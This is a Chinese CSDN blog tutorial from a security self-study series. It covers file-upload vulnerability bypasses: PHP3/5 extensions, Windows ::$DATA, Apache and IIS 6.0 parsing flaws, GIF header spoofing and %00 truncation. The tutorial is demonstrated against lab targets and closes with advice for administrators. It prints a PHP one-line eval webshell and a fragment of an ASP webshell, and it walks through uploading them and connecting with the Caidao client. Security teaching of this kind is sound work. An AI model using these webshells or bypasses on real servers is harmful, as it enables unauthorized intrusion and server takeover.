怎样点击收藏图的同时连接到其他php文件_网络安全自学篇之文件上传漏洞和IIS6.0解析漏洞及防御原理(二)...

本文详细介绍了文件上传漏洞的各种绕过技巧,包括PHP345文件绕过、Windows::$DATA绕过、Apache解析漏洞、%00截断上传以及IIS6.0解析漏洞。同时,强调了内容验证在防止文件上传攻击中的重要性,并给出了管理员防范措施。通过实例演示了如何利用这些漏洞进行文件上传,并提供了防御建议。
摘要由CSDN通过智能技术生成

作者介绍:杨秀璋

自幼受贵州大山的熏陶,养成了诚实质朴的性格。经过寒窗苦读,考入BIT,为完成自己的教师梦,放弃IT、航天等工作,成为贵财一名大学教师,并想把自己所学所感真心传授给自己的学生,帮助更多陌生人。

一.文件上传漏洞之扩展名限制

前一篇文章详细讲解了文件上传漏洞的原理、一句话木马和Caidao的基本用法,涉及JS绕过文件上传、MIME绕过文件上传、大小写绕过文件上传、点和空格绕过文件上传、htaccess文件绕过上传,这篇文章将继续分享文件上传漏洞。下面参考了Fox老师的upload-labs思维导图,供大家学习。

35a6ee3f6831ab59d9c3565bca0c789d.png

1.PHP345文件绕过上传

PHP3代表PHP版本3,这里用于文件绕过检测。一般的软件都是向下兼容,PHP3代码,PHP5同样兼容能够执行。如下图所示,fox.php5文件同样能够正常上传。

629231d59a6a99472baf76405095a3dd.png


2.Windows::$DATA绕过

Windows ::$DATA绕过只能用于Windows,Windows下NTFS文件系统有一个特性,即NTFS文件系统在存储数据流的一个属性DATA时,是请求a.php本身的数据。如果a.php还包含了其他的数据流,比如a.php:lake2.php,请求a.php:lake2.php::$DATA,则是请求a.php中的流数据lake2.php的流数据内容。简单来说,就是在数据后面加上::$DATA实现绕过,fox.php::$DATA返回fox.php数据。

1d28923122fcefa12b6cf15e2293812c.png

上传成功如下图所示,然后可以直接访问upload/fox.php文件。

546b77e3fb707fd6da651aabf8b6e912.png

3.Apache解析漏洞上传

Apache是从右到左判断解析,如果为不可识别解析,就再往左判断。比如1.php.xxx对Apache来说xxx是不可解析的,所以就会解析成1.php,这就是该漏洞的实现原理。

b13d72dedb56ee0b1913bbd69ad69b29.png

如上图所示,将本地“fox.php”修改为“fox.php.xxx”,然后点击上传。

3ccb23894f18baa31e9b040de7e749b4.png

接着尝试用菜刀去连接。
URL为靶场的网址:http://192.168.1.8/file_upload/upload/fox.php.xxx,密码为PHP一句话木马中的“fox”,代码如下:

<?php  eval($_POST[fox]); ?> 

下图是Caidao连接的示意图。

3324b0f23acf97ff37f610c650a4c30b.png

连接之后,成功获取文件目录,可以看到“fox.php.xxx”被成功上传。

043413e3554b4ff3b2ed796470958177.png

69fb7494cad1ac99cb28a04b9369e212.gif

.内容验证文件上传

内容检查是网站安全的重要手段之一。假设我们将包含一句话木马的“fox.php”修改为“1.jpg”并上传,有的网址会提示上传错误,因为JPG格式不能执行PHP文件脚本的。

<?php  eval($_POST[fox]); ?> 

88caaea74c155faad6495308c8a687ca.png

如下图所示,它会判断图片的文件头,包括gif、png、jpg等格式。

0840d2194c48479ae35a86d7f0b7fbca.png

文件头是用来判断数据格式的,这里尝试修改文件头进行上传,以gif文件为例,添加文件头“GIF89a”后即可上传成功。

0715e116aedcc506e8b55f417338ebc8.png

同样可以尝试BurpSuite抓包修改文件后缀.php进行上传。

5e2c0c8ca4e96399a6d30213be95333f.png

69fb7494cad1ac99cb28a04b9369e212.gif

三.%00截断上传

0x00是十六进制表示方法,是ASCII码为0的字符,在有些函数处理时,会把这个字符当做结束符。这个可以用在对文件类型名的绕过上。需要注意,00截断get是可以自动转换的,post需要特殊转换,下面举一个例子。

首先,选择上传一张包含一句话木马的“php.jpg”图片。

816e425632ab7a59d0c2b24755f6a3cf.png

然后,利用BurpSuite抓包并修改后缀名为“php.php%001.jpg”。如果直接修改为“php.php”可能会被过滤。

8c86abc3897c4ead55fd169d8a025187.png

这种方法仍然不可行,因为它采用post提交数据,需要特殊转换。这里选中“%00”右键转换为URL格式,如下图所示,然后再点击“Forward”提交数据即可。

3b0d68cd00b51e5030a3a822c358b959.png

文件成功上传,%00自动截断后面的内容。

d6e4f383ba3f167957325dc59f2851ec.png

69fb7494cad1ac99cb28a04b9369e212.gif

四.IIS6.0解析漏洞

ISS6.0解析漏洞分两种:

1.目录解析

以“*.asp”命名的文件夹里的文件都将会被当成ASP文件执行,比如“1.asp/1.jpg”,这里1.jpg会被当做asp文件执行。

利用IIS6.0解析漏洞,我们可以在网站下建立名字为“*.asp” 、“*.asa”的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析。例如创建目录“vidun.asp”,则“/vidun.asp/1.jpg”将被当作asp文件来执行。

2.文件解析

“*.asp;.jpg”像这种畸形文件名在 “;” 后面的直接被忽略,也就是说当成 “*.asp”文件执行。比如“1.asp;1.jpg”命名的文件,同样是以asp脚本进行执行。IIS6.0 默认的可执行文件除了asp还包含这三种:.asa、.cer、*.cdx。

网站上传图片的时候,将网页木马文件的名字改成“*.asp;.jpg”,分号后面的不被解析也同样会被IIS当作asp文件来解析并执行。例如上传一个图片文件,名字叫“vidun.asp;.jpg”的木马文件,该文件可以被当作asp文件解析并执行。


假设某网站是用IIS6.0搭建。

a2e79c970bbe54011c1e9a25351c3941.png

该ASP靶场存在一个图片上传的后台页面,如下图所示:

56c7a96964966c02a24386937e28fa31.png

第一步,我们制作一个名为“asp1.jpg”的一句话木马,核心代码如下:

"fox"))%>

3ee78402c9e9ec36826910ba6fd5ced3.png

第二步,尝试上传“asp1.jpg”图片,它会提示上传类型不正确。

4129f082bf0785a8a5cae492ced734e0.png

第三步,因为该网站检查了文件头类型,这里需要进行简单的修改,比如增加GIF文件头。

e7b35b38fd0064a2e46748c346ae8e1d.png

第四步,选择上传,此时能够成功上传。

e7676f5d2dcf5e9c0a48e9d4e5330172.png

第五步,接着尝试BurpSuite进行抓包,这里截取到数据包,点击“Send to Repeater”按钮。

e188e5ce0fad1f0e1c489e92e38d6d21.png

第六步,尝试在左边“upfile/”文件路径名后面增加文件名称“1.asp;”,然后点击请求发送。右边会显示文件成功上传,其路径详见图中。

961513f28685c74813f62b2c37d774b1.png

上传之后的文件可以成功访问,如下图所示。

7fc1b84707dfe31e2779f8a7c2ad8c3e.png

第七步,尝试进行Caidao连接,输入地址和密码“fox”。

310750ceadd13dad0cf4f3ce5d5782be.png

第八步,成功获取服务器的文件目录,如下图所示。

f42d899080502e57c3d7ee0ad293e350.png

注意:IIS6.0解析漏洞被发现的时候,微软是不承认这个漏洞的,所以没有进行相应的补丁修补。基本IIS6.0网站都很存在该漏洞。

同样的方法,某些TXT文件也是可以利用该漏洞进行上传。基本流程如下:

  • 先随意上传一个文件,观其url发现是asp脚本构造的页面

  • 在本地制作一个asp的一句话木马保存到文件中,然后打开burpsuite的代理功能去进行抓包修改

  • 发送的POST请求中发现刚发送的asp.txt被保存的第二个upload文件下,为了让其执行,我们在第二个upload后面加入/webshell.asp文件

  • 通过上一个步骤,有效地将asp.txt这个一句话木马放入webshell.asp中,IIS利用解析漏洞将asp.txt当作asp脚本去执行

984d5d88d94d8a91eaa4f1caad04db1d.png

在burp中转发浏览器显示成功上传,并列出上传的地址。最后通过Caidao远程连接获取目录。

daa2ea54c441094ab7e5bc671ee1022c.png

另一种方法,将刚刚的asp木马文件名修改为webshell.asp;.txt,因为该网站不允许上传以asp作为后缀的文件名,所以我们使用.txt后缀,但分号后面的内容将会被IIS过滤不去解析,所以这就是个asp脚本。

501fe2de5aec16570788b9a46ccd8036.png

通过Caidao成功获取目录如下图所示,建议尽量放置在隐藏位置;同时某些网站有上传大小限制,可以尝试在一句话木马文件中填充内容。

2fcd0e2d10051a929d202cb6b67673f9.png

如果您是一名网站管理员,您需要注意:

(1) 进行文件黑名单和白名单过滤是非常必要的。

(2) 文件的完整性校验、文件头校验、文件格式校验、文件大小校验都是必要的。

(3) 避免像IIS6.0解析漏洞,注意相关CVE漏洞提示并及时修复。

(4) 如果可以,尝试对上传文件的内容进行简单的校验。

(5) 网站防火墙、安全狗都需要安装,弱口令、SQL注入、XSS等常见漏洞需要预防。

69fb7494cad1ac99cb28a04b9369e212.gif

五.总结

写道这里,这篇基础性文章就此结束,后面会继续分享文件上传漏洞。最后希望基础性文章对您有所帮助,作者也是这个领域的菜鸟一枚,希望与您共同进步,共勉。上周末女神来了一趟,哈哈。这周举办会议,非常忙碌,但也挤些很少的时间分享新知识,且看且珍惜。
(By:Eastmount https://blog.csdn.net/Eastmount/article/details/103452557  ) 69fb7494cad1ac99cb28a04b9369e212.gif

68ecf5167de847658669435092f24908.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值